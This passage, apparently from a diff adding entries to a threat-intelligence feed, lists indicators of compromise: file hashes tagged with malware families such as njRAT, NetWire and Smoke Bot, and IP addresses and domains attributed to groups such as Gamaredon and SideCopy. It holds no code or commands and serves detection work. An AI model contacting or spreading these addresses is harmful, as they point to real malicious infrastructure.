"32973d7e38dd8b2901408a6800355b20bd24e87802488ed8a96eb180727c23ee" + ], + "malwareList": [ + { + "name": "Coinminer", + "aliases": [ + "BitCoinMiner", + "BitMiner" + ] + } + ], + "threatList": null + }, + { + "id": "86ecf843b1884ed624ce4e7e7af5c5d3628712d1", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274278126763, + "hash": [ + "25e7e9fd90efa22c75629aea75a49de3", + "90a0a7ceb4e615f140f4958791a95d1104d14198", + "58190c4af418d847f5cd805d8001d777c582dc4ea7c77e23bf7acc617e78a06f" + ], + "malwareList": [ + { + "name": "njRAT", + "aliases": [ + "Bladabindi", + "Ratenjay" + ] + } + ], + "threatList": null + }, + { + "id": "cda9987962e81d33e3f676ee10da9be3fa55f6f7", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274294331443, + "hash": [ + "7cb8192849049c09c5b2e4593b45a470", + "88f77bd5ce400f46939dbc09a65aeb961ddaeb08", + "d1142566663fd37b3da974985abbd208c1c38893f6b36e95313d10ab8f4e3966" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "603dfdc2479a80a72265ffc27aa915ec021f2d73", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274297317757, + "hash": [ + "03694a0c7f449eeefe76126c282b64d5", + "2a14e7963b94d57ff0fb75da705876b561bbd9c1", + "2d77958cfaf04ab43af620efc275335c3d5a065063467b1d3ba7be7e045d5465" + ], + "malwareList": [ + { + "name": "Smoke Bot", + "aliases": [ + "Sharik", + "Dofoil", + "Smoke Loader" + ] + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "560def2312e83e41597e5f5142135db32849d893", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274303087012, + "hash": [ + "b68886b529c79f23dc4feebbd6759410", + 
"440e54667e6bcc472f5138f281e2c64ab9876e8f", + "8c5d6dbca2c586cc534a602ae7ce2d025de8718f07cb9f46ae648b011259406b" + ], + "malwareList": [ + { + "name": "Gootkit", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "4e3806a0b1a842802233c17c54faaf205eda8ecd", + "type": "network", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274306130414, + "ip": [ + "185.174.135.68" + ], + "malwareList": null, + "threatList": [ + { + "name": "Bahamut", + "title": "Bahamut - New indicators have been found" + } + ] + }, + { + "id": "d16dfe72c8451d74143e68ee89932e8cac76b4e1", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274307490408, + "hash": [ + "eac19928fa57e346743ed26ca1d626d9", + "48d34f3fffdb44644eae5f54ea4225353d5e6529", + "94c84ab228ca377a6e19c18425fc2c367c0cb6efe349b724b351fcf0543fb0c1" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "677b5f02043285f02a5f1af1b2c204ace26d1bc1", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274307494224, + "hash": [ + "0492133038d9978434c60c2e119a0634", + "4ccf80bacdb0b0d9b54c55bffadc0a20dc701b79", + "a0225fb4feaeb71fd9b07e9dda07eaef4c858fd6bb38d8a222bc131861de6438" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "d5ad837d0e12bd40ab88ec594af557f913289ab5", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274307497961, + "hash": [ + "31fd311d1d9b79df2cfec50e413d3531", + "508e3bb76e7e8a6d8bbaa522bf63aee294fc64d8", + "e7b6d736338fc0680dd356102dfd4cefe3654160fb1ebfd2878d643c16c12979" + ], + "malwareList": [ + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": 
"bb83878c6489e8551bc3e68e678973a35ff4deed", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274307655734, + "hash": [ + "5fdc5f6e6709854ab6c4a76e99918808", + "1a5cbbb4a1a43ed1da1381da74d610cbe28944d1", + "6b851e42c5767da59d14509002df0e7420091c091a94ad746656844760eee6ed" + ], + "malwareList": [ + { + "name": "RMS", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "3425b5c39b74c268326c49f17d2f4559e6cec1d1", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274307659084, + "hash": [ + "f4f023ea03953b4a5bb4a818e65a5a42", + "4b11545dd5fc699036e671d802a65b9115c1f1e5", + "68a1075d440785115f189442808bf6a54651cce99ed94c8f79e9ad35632ae3a6" + ], + "malwareList": [ + { + "name": "RMS", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "8c65e6f86547119aa8bfd88afbaff81e89414e48", + "type": "file", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274308379895, + "hash": [ + "be726f464279b2b88c054fa7e44f8ab4", + "1687333070f0c9c132abbd8b15ac000be065cd0c", + "a5a61e8f05480c97c28308df2af134b8a2ec7b78324338ff6d410a5d4624bec9" + ], + "malwareList": [ + { + "name": "AsyncRAT", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "bf7070cac3497d9a6e5d9b618f0378369de34e7f", + "type": "network", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "domain": "lyer3.xyz", + "seqUpdate": 17274336132953, + "malwareList": null, + "threatList": [ + { + "name": "Donot Team", + "title": "Donot Team - New indicators have been found" + } + ] + }, + { + "id": "9c5ec99f52dc45a7361bef3c7d4ab838040fcb7d", + "type": "network", + "dateFirstSeen": "2024-09-27T00:00:00+03:00", + "dateLastSeen": "2024-09-27T00:00:00+03:00", + "seqUpdate": 17274336173076, + "ip": [ + "154.9.235.17" + ], + "malwareList": 
null,
+ "threatList": [
+ {
+ "name": "SideCopy",
+ "title": "SideCopy - New indicators have been found"
+ }
+ ]
+ },
+ {
+ "id": "db34929880bcd371fccc9e6c9aeec5d54913fdb1",
+ "type": "file",
+ "dateFirstSeen": "2024-09-27T00:00:00+03:00",
+ "dateLastSeen": "2024-09-27T00:00:00+03:00",
+ "seqUpdate": 17274347525580,
+ "hash": [
+ "f421d7ca0d6d4c6737af88868173e705",
+ "daaeaba45589187696bbc1aec7df7844e451cdcd",
+ "9aed17deae25608c23d7e0e8a9f9bf5061a705019bfa476830d7b28bf19ac1d5"
+ ],
+ "malwareList": [
+ {
+ "name": "",
+ "aliases": null
+ },
+ {
+ "name": "BackSwap",
+ "aliases": []
+ }
+ ],
+ "threatList": null
+ },
+ {
+ "id": "182edafcbe915a86ee575bc94d2ae3a9270cac7b",
+ "type": "file",
+ "dateFirstSeen": "2024-09-27T00:00:00+03:00",
+ "dateLastSeen": "2024-09-27T00:00:00+03:00",
+ "seqUpdate": 17274348927265,
+ "hash": [
+ "ddeeb8433845d5d41f115ff82a1e6c24",
+ "be4fd2bc0698daf772ee4adaa98ffba6bf75a4af",
+ "9be09f613f3c75c02a2ff1b8ab30d1c66861b8155e838e92156f5c965975bdf8"
+ ],
+ "malwareList": [
+ {
+ "name": "HawkEye",
+ "aliases": [
+ "HawkSpy"
+ ]
+ }
+ ],
+ "threatList": null
+ },
+ {
+ "id": "fdc69991e4716d52d60feadaa2962ab3b51472c1",
+ "type": "file",
+ "dateFirstSeen": "2024-09-27T00:00:00+03:00",
+ "dateLastSeen": "2024-09-27T00:00:00+03:00",
+ "seqUpdate": 17274348927854,
+ "hash": [
+ "cbed05c46cc7521b6be511808dc9fe52",
+ "d8bf5aff1eda880688b547817c15fb27545fc9d4",
+ "3b72fae5583397a2289167442a18021bc37086a525cedf9034aa3b988e171c57"
+ ],
+ "malwareList": [
+ {
+ "name": "HawkEye",
+ "aliases": [
+ "HawkSpy"
+ ]
+ }
+ ],
+ "threatList": null
+ },
+ {
+ "id": "6b3e5bd1a0f8b3e9a6fd0e5e31396c7f2d7599c7",
+ "type": "file",
+ "dateFirstSeen": "2024-09-27T00:00:00+03:00",
+ "dateLastSeen": "2024-09-27T00:00:00+03:00",
+ "seqUpdate": 17274348928199,
+ "hash": [
+ "55b47d3b115df7babbcc040e99bb4058",
+ "dac610d1a87fe4338804da7ea319fb2fcb545833",
+ "a219a53e27d399a1d45adf4c0d0ce74688d3bd7764fe093b2fb7c486253dffda"
+ ],
+ "malwareList": [
+ {
+ "name": "HawkEye",
+ "aliases": [
+ "HawkSpy"
+ ]
+ }
+ ],
+ "threatList": null
+ },
+ {
+ "id": "2ba49a6966d178a92d459f5f6c102ccef38d11b9",
+ "type": "file",
+ "dateFirstSeen": "2024-09-27T00:00:00+03:00",
+ "dateLastSeen": "2024-09-27T00:00:00+03:00",
+ "seqUpdate": 17274358687154,
+ "hash": [
+ "b69f0a46e4d7ba1128dc28d626382d1c",
+ "da2f548b0215658f47a1e7174b4ce193112494c1",
+ "65a77893bc157ad59fbb25a66eaf3ef6baecd0384b73f8d6fe6a8a8176a69ada"
+ ],
+ "malwareList": [
+ {
+ "name": "FlawedAmmyy",
+ "aliases": []
+ }
+ ],
+ "threatList": null
+ },
+ {
+ "id": "490ee55686350738271b49ca6040e464dc201852",
+ "type": "network",
+ "dateFirstSeen": "2024-09-27T00:00:00+03:00",
+ "dateLastSeen": "2024-09-27T00:00:00+03:00",
+ "seqUpdate": 17274364413825,
+ "ip": [
+ "65.109.161.63"
+ ],
+ "malwareList": [
+ {
+ "name": "Mirai",
+ "aliases": []
+ }
+ ],
+ "threatList": null
+ },
+ {
+ "id": "e6f4512c7f95391cea199d43289ca023d64ecbff",
+ "type": "network",
+ "dateFirstSeen": "2024-09-27T00:00:00+03:00",
+ "dateLastSeen": "2024-09-27T00:00:00+03:00",
+ "seqUpdate": 17274364417472,
+ "ip": [
+ "172.105.24.73"
+ ],
+ "malwareList": [
+ {
+ "name": "Mirai",
+ "aliases": []
+ }
+ ],
+ "threatList": null
+ },
+ {
+ "id": "46840d5bb6f16f1bd796c39cd4919c1c92614547",
+ "type": "file",
+ "dateFirstSeen": "2024-09-27T00:00:00+03:00",
+ "dateLastSeen": "2024-09-27T00:00:00+03:00",
+ "seqUpdate": 17274368859171,
+ "hash": [
+ "ce1fc9ccc0f51c460addcc8add1f1395",
+ "de33bec106bbd1f02712628666ff7163443c8241",
+ "723bea7a1be8aff0e81d72b1a6b1aaa56e330a2cec707d2bb8680fca7b079b04"
+ ],
+ "malwareList": [
+ {
+ "name": "",
+ "aliases": null
+ }
+ ],
+ "threatList": null
+ },
+ {
+ "id": "bc1055de116dbb47734dc9e4892207e8668a525f",
+ "type": "file",
+ "dateFirstSeen": "2024-09-27T00:00:00+03:00",
+ "dateLastSeen": "2024-09-27T00:00:00+03:00",
+ "seqUpdate": 17274375334385,
+ "hash": [
+ "ae6f2aa9b5d42b21c05c47b8c89953c4",
+ "cd3f302b272d80654500d84b0357c09a2e127dab",
+
"d84cd9e19d032ee3480c53ed671872e65f544348d9e148ae6ba0b6afb6212986"
+ ],
+ "malwareList": [
+ {
+ "name": "",
+ "aliases": null
+ }
+ ],
+ "threatList": null
+ },
+ {
+ "id": "d4719034b6c5f63a4b62733b68d0baa0dbe3872a",
+ "type": "file",
+ "dateFirstSeen": "2024-09-27T00:00:00+03:00",
+ "dateLastSeen": "2024-09-27T00:00:00+03:00",
+ "seqUpdate": 17274377781309,
+ "hash": [
+ "85e4db6ede475395100ed5636ea82987",
+ "c9336b45e77e7d6305c9c18e5fcc0fceb21cca8f",
+ "979cf23030d85d058482fb7e0ca93535ae0a8b4dc858979663e277e50b3fae49"
+ ],
+ "malwareList": [
+ {
+ "name": "NetWire",
+ "aliases": [
+ "NetWiredRC"
+ ]
+ }
+ ],
+ "threatList": null
+ },
+ {
+ "id": "47fca0d2d1c894eff9d2bad5790c1b832aefb16e",
+ "type": "file",
+ "dateFirstSeen": "2024-09-27T00:00:00+03:00",
+ "dateLastSeen": "2024-09-27T00:00:00+03:00",
+ "seqUpdate": 17274377784125,
+ "hash": [
+ "f81c87e62789558f5aa873556b44d2fc",
+ "dcdfd1ab57ebe453442d80e7bb59a5872b0ab3b9",
+ "9742134166b6b1981d78e29c2512ff2be79e666da8fa0b7f44c4543446907494"
+ ],
+ "malwareList": [
+ {
+ "name": "NetWire",
+ "aliases": [
+ "NetWiredRC"
+ ]
+ }
+ ],
+ "threatList": null
+ },
+ {
+ "id": "0d36203a7ebf53a1985701f68f3d65436bf268fc",
+ "type": "file",
+ "dateFirstSeen": "2024-09-27T00:00:00+03:00",
+ "dateLastSeen": "2024-09-27T00:00:00+03:00",
+ "seqUpdate": 17274378320331,
+ "hash": [
+ "a8c024072ec5e07e3bad47792a535bf3",
+ "7dae291271177f568b5d00e72cd7e920f5f01a69",
+ "9e641690ae66faffab157c16b1457728f1a0ccaf6a3f2b83b4171253fdaf14d0"
+ ],
+ "malwareList": [
+ {
+ "name": "Smoke Bot",
+ "aliases": [
+ "Sharik",
+ "Dofoil",
+ "Smoke Loader"
+ ]
+ },
+ {
+ "name": "",
+ "aliases": null
+ }
+ ],
+ "threatList": null
+ },
+ {
+ "id": "e71268355b6b73fe4a525caf4996b629cfd51e37",
+ "type": "file",
+ "dateFirstSeen": "2024-09-27T00:00:00+03:00",
+ "dateLastSeen": "2024-09-27T00:00:00+03:00",
+ "seqUpdate": 17274381196765,
+ "hash": [
+ "2206b313a3eda55875ba6fd2286f27fa",
+ "e180ae6bce3eab5ca1b18dd3e951269ab168cd57",
+
"13b19b2e3ca0476b69e32b0417b81203098b1220315e2cc08741840b9233edfb"
+ ],
+ "malwareList": [
+ {
+ "name": "",
+ "aliases": null
+ }
+ ],
+ "threatList": null
+ },
+ {
+ "id": "70816058c31254333f53f3087dbe195cdd8dde1a",
+ "type": "network",
+ "dateFirstSeen": "2024-09-27T00:00:00+03:00",
+ "dateLastSeen": "2024-09-27T00:00:00+03:00",
+ "domain": "www.toorisugita.ru",
+ "seqUpdate": 17274384205284,
+ "malwareList": null,
+ "threatList": [
+ {
+ "name": "Gamaredon",
+ "title": "Gamaredon - New indicators have been found"
+ }
+ ]
+ },
+ {
+ "id": "cd41c5d0daac1cc68247115f62cd54c398cbb985",
+ "type": "file",
+ "dateFirstSeen": "2024-09-27T00:00:00+03:00",
+ "dateLastSeen": "2024-09-27T00:00:00+03:00",
+ "seqUpdate": 17274385570407,
+ "hash": [
+ "378b28c03897ad232799fa053ee10ecc",
+ "e0b96bc72940e592e27859ba31d2443af6d4fe86",
+ "c715848ee0a9578540aeb32bb86500b75a7d544c2ace6904cba6cc28cb708641"
+ ],
+ "malwareList": [
+ {
+ "name": "HawkEye",
+ "aliases": [
+ "HawkSpy"
+ ]
+ }
+ ],
+ "threatList": null
+ },
+ {
+ "id": "bf482a9529e847b6e5e965e5a1bb622ea50663b1",
+ "type": "file",
+ "dateFirstSeen": "2024-09-27T00:00:00+03:00",
+ "dateLastSeen": "2024-09-27T00:00:00+03:00",
+ "seqUpdate": 17274385969949,
+ "hash": [
+ "3b88eaf2f527a3f39a962bd671a4e989",
+ "e32500882bf1555d670d1fc62e2d5efd018543e1",
+ "ee7d7ffd1b18a148475542156a3919793ae15459879df4a7a482961284a48db5"
+ ],
+ "malwareList": [
+ {
+ "name": "njRAT",
+ "aliases": [
+ "Bladabindi",
+ "Ratenjay"
+ ]
+ }
+ ],
+ "threatList": null
+ },
+ {
+ "id": "0223e6bccfeb30e5f8e8f59d4448b29a6af4ee41",
+ "type": "file",
+ "dateFirstSeen": "2024-09-27T00:00:00+03:00",
+ "dateLastSeen": "2024-09-27T00:00:00+03:00",
+ "seqUpdate": 17274388148851,
+ "hash": [
+ "24cbbe12f17595c97c1af4642357187a",
+ "e299f3dda715f0a03de64098a4db7c54dccbcc0c",
+ "648ea1b7a48bdbf9af513aa61a1baf51cdb3aea9472f7170f40848b3dc114c64"
+ ],
+ "malwareList": [
+ {
+ "name": "Spora",
+ "aliases": []
+ }
+ ],
+ "threatList": null
+ },
+ {
+ "id":
"de72b46468e7e09ba0b749545b52bd93661e1abc",
+ "type": "file",
+ "dateFirstSeen": "2024-09-27T00:00:00+03:00",
+ "dateLastSeen": "2024-09-27T00:00:00+03:00",
+ "seqUpdate": 17274390470529,
+ "hash": [
+ "9de760bd8d17878b4451e164c86cf6df",
+ "bc7b52ad6e3ebd54cdb174bc36e80c24419e1e54",
+ "116f2b27c2dbdbd90eb8231b5b83a0d6ad34616c2aaa3f7bd2ff1445244e1d27"
+ ],
+ "malwareList": [
+ {
+ "name": "Gootkit",
+ "aliases": []
+ }
+ ],
+ "threatList": null
+ },
+ {
+ "id": "2d4e3926a8899f9f09e70402bd73f3a2ef3409a4",
+ "type": "file",
+ "dateFirstSeen": "2024-09-27T00:00:00+03:00",
+ "dateLastSeen": "2024-09-27T00:00:00+03:00",
+ "seqUpdate": 17274390474696,
+ "hash": [
+ "89c22ae6169a4c3fb6b8a4ccd9956586",
+ "c2cc7b96843909bb0a3887185296dc03e63ede1e",
+ "bfef3c7ffd8e136bceba615e6ecab826efdc7074dc2f501775c17a9c7d93a4a5"
+ ],
+ "malwareList": [
+ {
+ "name": "Gootkit",
+ "aliases": []
+ }
+ ],
+ "threatList": null
+ },
+ {
+ "id": "8e9e825486d790ef2b7e8e31503a2184f487b3db",
+ "type": "file",
+ "dateFirstSeen": "2024-09-27T00:00:00+03:00",
+ "dateLastSeen": "2024-09-27T00:00:00+03:00",
+ "seqUpdate": 17274390477762,
+ "hash": [
+ "d927088ea18c1efefc74b93b9af2cab2",
+ "e0ab8210dede87d0ceadc97173afd36e833ad99b",
+ "77228588e51358d952c1a30eb05be837a0af8d52029628ad29226f8f9774a718"
+ ],
+ "malwareList": [
+ {
+ "name": "Gootkit",
+ "aliases": []
+ }
+ ],
+ "threatList": null
+ },
+ {
+ "id": "8fc283e3c6c11dec54cbb06247b8cb9b14344a69",
+ "type": "file",
+ "dateFirstSeen": "2024-09-27T00:00:00+03:00",
+ "dateLastSeen": "2024-09-27T00:00:00+03:00",
+ "seqUpdate": 17274390649015,
+ "hash": [
+ "cad3de2a985857da7fcf2caa7a0f9401",
+ "e18a6e50b6e2316de12c9931dd09bb7753471b08",
+ "d3e42ce832ceaa6d6421474c414fcf9055faacd783accb7ac41970bc5a43ee36"
+ ],
+ "malwareList": [
+ {
+ "name": "",
+ "aliases": null
+ }
+ ],
+ "threatList": null
+ },
+ {
+ "id": "eac4d0a460aa12ae3339aeb6658d62a3925d0184",
+ "type": "file",
+ "dateFirstSeen": "2024-09-27T00:00:00+03:00",
+ "dateLastSeen":
"2024-09-27T00:00:00+03:00",
+ "seqUpdate": 17274390743314,
+ "hash": [
+ "d55a4297e6e66ae56dab989e25b0d27b",
+ "ce18555d994c6e90be60096a30666aa24e91486f",
+ "aec2c56f483af409d980be7ef48ad7674e7004b137bcd3cfd928c982643ad120"
+ ],
+ "malwareList": [
+ {
+ "name": "",
+ "aliases": null
+ }
+ ],
+ "threatList": null
+ },
+ {
+ "id": "f309d8b38d68a2f6646d6620410009a84fbacf76",
+ "type": "file",
+ "dateFirstSeen": "2024-09-27T00:00:00+03:00",
+ "dateLastSeen": "2024-09-27T00:00:00+03:00",
+ "seqUpdate": 17274394137643,
+ "hash": [
+ "d2ccf7849fbf824c9017bb792f532342",
+ "e45f36c06b0d7cb1745ce3d24d7e9bfe2584218c",
+ "f997d4a193edfbb05db544d0508024f4e00d34e774d3f5a2df6663e8a9f8587c"
+ ],
+ "malwareList": [
+ {
+ "name": "",
+ "aliases": null
+ }
+ ],
+ "threatList": null
+ },
+ {
+ "id": "7a35068e66d1f435c39887cc7b0bd0f230043225",
+ "type": "file",
+ "dateFirstSeen": "2024-09-27T00:00:00+03:00",
+ "dateLastSeen": "2024-09-27T00:00:00+03:00",
+ "seqUpdate": 17274394579336,
+ "hash": [
+ "382746a97059c278137feda966a9a9da",
+ "d9cd04be26d9cb478b97fa5a95cd50609fc6b1f9",
+ "dad7c9456f5e150ad73f33688d962ca2076cd51f3a61f1f14e3c6864b7734733"
+ ],
+ "malwareList": [
+ {
+ "name": "",
+ "aliases": null
+ }
+ ],
+ "threatList": null
+ },
+ {
+ "id": "88421d94ae0c9569f69771927cd730eef56f0020",
+ "type": "file",
+ "dateFirstSeen": "2024-09-27T00:00:00+03:00",
+ "dateLastSeen": "2024-09-27T00:00:00+03:00",
+ "seqUpdate": 17274394583010,
+ "hash": [
+ "bad0c74a0a0ec1bc7e9eec6b5705dbf0",
+ "d9f28ca8b611a88eaac105cd9eb9c377c9212798",
+ "9f510a1c0af8f6d065702dcb1189a2572b6818259330031fedc9b42d15b60a24"
+ ],
+ "malwareList": [
+ {
+ "name": "",
+ "aliases": null
+ }
+ ],
+ "threatList": null
+ },
+ {
+ "id": "3c2d562ce4d5d5fe1b224d6a68418bf88a6ba1a2",
+ "type": "file",
+ "dateFirstSeen": "2024-09-27T00:00:00+03:00",
+ "dateLastSeen": "2024-09-27T00:00:00+03:00",
+ "seqUpdate": 17274394778143,
+ "hash": [
+ "d67e609a0f8870ee5c5f576941cecb45",
+ "b6a77183de86b9c875476b4951a9bc85067f57bf",
+
"4c746f7353ec22799366e5b87f75a9c00d64af5d775aed54ef5cbd413c6576d6"
+ ],
+ "malwareList": [
+ {
+ "name": "RMS",
+ "aliases": []
+ }
+ ],
+ "threatList": null
+ },
+ {
+ "id": "026acdb25ef4f4a654253bda920bc0dbedc0d5f8",
+ "type": "file",
+ "dateFirstSeen": "2024-09-27T00:00:00+03:00",
+ "dateLastSeen": "2024-09-27T00:00:00+03:00",
+ "seqUpdate": 17274395471684,
+ "hash": [
+ "d722759dab276601ce5a6071e282b6c4",
+ "dd05ec5bbc4a0fd9a375e8a8238b8579a964125f",
+ "6071511eea15d5b1d9d8bf9803ad71b3fe65c455b77d683a3aaf887fa54cb447"
+ ],
+ "malwareList": [
+ {
+ "name": "",
+ "aliases": null
+ }
+ ],
+ "threatList": null
+ },
+ {
+ "id": "310607a1a9256ac2897ced1fc6fc9703dc243621",
+ "type": "network",
+ "dateFirstSeen": "2024-09-27T00:00:00+03:00",
+ "dateLastSeen": "2024-09-27T00:00:00+03:00",
+ "seqUpdate": 17274406173497,
+ "ip": [
+ "36.41.184.42"
+ ],
+ "malwareList": [
+ {
+ "name": "Mirai",
+ "aliases": []
+ }
+ ],
+ "threatList": null
+ },
+ {
+ "id": "85bc206911842c92a073f0f39c0368fc954cce01",
+ "type": "file",
+ "dateFirstSeen": "2024-09-27T00:00:00+03:00",
+ "dateLastSeen": "2024-09-27T00:00:00+03:00",
+ "seqUpdate": 17274407218907,
+ "hash": [
+ "81d13c52f73074610ba6a10ebc02a27b",
+ "e5a332a7734e763a52de27e947a9eefbc1441346",
+ "735f772144022f1c62128a5348c180cc5df2d3642dda04af4035c199e40e8abd"
+ ],
+ "malwareList": [
+ {
+ "name": "njRAT",
+ "aliases": [
+ "Bladabindi",
+ "Ratenjay"
+ ]
+ }
+ ],
+ "threatList": null
+ },
+ {
+ "id": "3632ef6be762e6134cd5e3b80f2c19e62db0dea7",
+ "type": "file",
+ "dateFirstSeen": "2024-09-27T00:00:00+03:00",
+ "dateLastSeen": "2024-09-27T00:00:00+03:00",
+ "seqUpdate": 17274408424326,
+ "hash": [
+ "a1293f1c2afa9da6b51d618e0174ca0e",
+ "e606cbdcb45a7e93fc4a8edcd172eee2a5832730",
+ "03e0d1f71cf040c5a7f1c5ef8933f705b35336cecc6592574dad1dd5066c00b9"
+ ],
+ "malwareList": [
+ {
+ "name": "HawkEye",
+ "aliases": [
+ "HawkSpy"
+ ]
+ }
+ ],
+ "threatList": null
+ },
+ {
+ "id": "5ed9561112cc4fe4207035f31df97d032ae08eea",
+ "type": "file",
+ "dateFirstSeen": "2024-09-27T00:00:00+03:00",
+ "dateLastSeen": "2024-09-27T00:00:00+03:00",
+ "seqUpdate": 17274409153512,
+ "hash": [
+ "9b52dbefe7d0625b6b7f7f4019e83f50",
+ "e44929a0ac1cd663c5e9f1d51c88d4cdbb08eade",
+ "ee5a3419365f997d9b498192b1879bca2d8c807ae7f5ea21633a0d55533bac7e"
+ ],
+ "malwareList": [
+ {
+ "name": "FlawedAmmyy",
+ "aliases": []
+ }
+ ],
+ "threatList": null
+ },
+ {
+ "id": "a452045b7ba73e00486cdd74b95920bf71e25aa9",
+ "type": "file",
+ "dateFirstSeen": "2024-09-27T00:00:00+03:00",
+ "dateLastSeen": "2024-09-27T00:00:00+03:00",
+ "seqUpdate": 17274435754806,
+ "hash": [
+ "7b57aed415ba3bf05973b460b81f6bea",
+ "e6f3f3a26c3907f9ac35fa6937e9e7197d4abafd",
+ "5d63bc4a7bb09ebe55c3057d274f8a386d73f3dfb1d2ff19c56b75580f439a2e"
+ ],
+ "malwareList": [
+ {
+ "name": "NetWire",
+ "aliases": [
+ "NetWiredRC"
+ ]
+ }
+ ],
+ "threatList": null
+ },
+ {
+ "id": "7e4f558ab10288e65121f244d90a695dc392d497",
+ "type": "file",
+ "dateFirstSeen": "2024-09-27T00:00:00+03:00",
+ "dateLastSeen": "2024-09-27T00:00:00+03:00",
+ "seqUpdate": 17274435758044,
+ "hash": [
+ "a0fad09ed4b8680bbd0532a646b169bb",
+ "e74da3aec697099edbe015ec290ba094fbe74765",
+ "592fed9892a45702e3aeac01a835d1ffc7b937638126a41254c546f511c2e9df"
+ ],
+ "malwareList": [
+ {
+ "name": "NetWire",
+ "aliases": [
+ "NetWiredRC"
+ ]
+ }
+ ],
+ "threatList": null
+ },
+ {
+ "id": "334072131fbc04d58483e8b3b223d2aecb0c6c4f",
+ "type": "file",
+ "dateFirstSeen": "2024-09-27T00:00:00+03:00",
+ "dateLastSeen": "2024-09-27T00:00:00+03:00",
+ "seqUpdate": 17274435761467,
+ "hash": [
+ "af6a38b190a9855643d441488d393e32",
+ "e8eb03ac5484e476dc5b9677d2c97b6c013fa819",
+ "56bb9c26e51e4ab272ed0156e0f5effe06c2778ba7b6ccf31371bd662fbb60cd"
+ ],
+ "malwareList": [
+ {
+ "name": "NetWire",
+ "aliases": [
+ "NetWiredRC"
+ ]
+ }
+ ],
+ "threatList": null
+ },
+ {
+ "id": "3c977c8ebb2023b7d6031a36ca05321b9dbabf95",
+ "type": "file",
+ "dateFirstSeen": "2024-09-27T00:00:00+03:00",
+ "dateLastSeen":
"2024-09-27T00:00:00+03:00",
+ "seqUpdate": 17274440087462,
+ "hash": [
+ "7023aacc33944927c5dd809b0c5eaeb9",
+ "6e9c45f15d7057f9b88a2192ae2f4724187758c0",
+ "5bfd7465437992ff5cb457bcf7612222a5a2054f5805ab220e47f68563a450d6"
+ ],
+ "malwareList": [
+ {
+ "name": "",
+ "aliases": null
+ },
+ {
+ "name": "Smoke Bot",
+ "aliases": [
+ "Sharik",
+ "Dofoil",
+ "Smoke Loader"
+ ]
+ }
+ ],
+ "threatList": null
+ },
+ {
+ "id": "b86027d2e4733947eaae6b40cab8e6db10ebffbe",
+ "type": "file",
+ "dateFirstSeen": "2024-09-27T00:00:00+03:00",
+ "dateLastSeen": "2024-09-27T00:00:00+03:00",
+ "seqUpdate": 17274441571367,
+ "hash": [
+ "ed339c1c0f77a243fe965da02e680f8a",
+ "e3f2d106e5257a9472d811b90c3b0ccb547c4bb3",
+ "e41378b088f49a71bf3b60b01c1ca6c0d68df021e108b482b7b56dc5fb625da1"
+ ],
+ "malwareList": [
+ {
+ "name": "",
+ "aliases": null
+ }
+ ],
+ "threatList": null
+ },
+ {
+ "id": "1f0c9a3ba6dbaf349b81fb44cccfa8178e7ac1e5",
+ "type": "file",
+ "dateFirstSeen": "2024-09-27T00:00:00+03:00",
+ "dateLastSeen": "2024-09-27T00:00:00+03:00",
+ "seqUpdate": 17274446106035,
+ "hash": [
+ "fdba60a20306e2fda2bb1f9368a36003",
+ "ed728396886050f720f785ed485bda1c8b9ffc5d",
+ "631b05ecb72c7aff57c3fff7b5798645cbe828360b2a801943c1f7338ad7fa8b"
+ ],
+ "malwareList": [
+ {
+ "name": "NetWire",
+ "aliases": [
+ "NetWiredRC"
+ ]
+ }
+ ],
+ "threatList": null
+ },
+ {
+ "id": "394be6f384c3c57920b58300c22dadf4e321dba4",
+ "type": "file",
+ "dateFirstSeen": "2024-09-27T00:00:00+03:00",
+ "dateLastSeen": "2024-09-27T00:00:00+03:00",
+ "seqUpdate": 17274446110720,
+ "hash": [
+ "1813de79d1cd738474b7e65ff9380012",
+ "eda67d7fb6b3b7a96f83b8ce8f60cd5662487c9b",
+ "9eff2c7459e1d7e467a6818138ab91ea3402db7bda7259b527cabc2b032d7dbe"
+ ],
+ "malwareList": [
+ {
+ "name": "NetWire",
+ "aliases": [
+ "NetWiredRC"
+ ]
+ }
+ ],
+ "threatList": null
+ },
+ {
+ "id": "69f50a5dd0ca04a7278312f75546242041d9752e",
+ "type": "file",
+ "dateFirstSeen": "2024-09-27T00:00:00+03:00",
+ "dateLastSeen":
"2024-09-27T00:00:00+03:00",
